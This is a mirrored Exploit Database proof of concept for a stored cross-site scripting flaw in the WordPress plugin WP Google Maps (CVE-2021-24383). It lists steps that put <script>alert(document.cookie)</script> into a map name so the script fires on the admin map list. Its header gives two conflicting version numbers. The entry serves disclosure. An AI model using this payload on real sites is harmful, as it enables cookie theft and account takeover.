WordPress Plugin WP Google Maps 8.1.11 – Stored Cross-Site Scripting (XSS)

• Exploit Database
• 22 阅读

• 作者： Mohammed Adam
  日期： 2021-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50051/

• # Exploit Title: WordPress Plugin WP Google Maps 8.1.11 - Stored Cross-Site Scripting (XSS)
  # Date: 22/6/2021
  # Exploit Author: Mohammed Adam
  # Vendor Homepage: https://www.wpgmaps.com/
  # Software Link: https://wordpress.org/plugins/wp-google-maps/
  # Version: 5.7.2
  # Tested on: Windows 10
  # CVE: CVE-2021-24383
  # References link: https://wpscan.com/vulnerability/1270588c-53fe-447e-b83c-1b877dc7a954
  
  *Proof of Concept*
  
  *Steps to Reproduce:*
  
  1) Edit a map (e.g
  /wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1)
  
  2) Change Map Name to <script>alert(document.cookie)</script>
  
  3) Save the Map
  
  4) Stored XSS will be triggered when viewing the Map List
  (/wp-admin/admin.php?page=wp-google-maps-menu)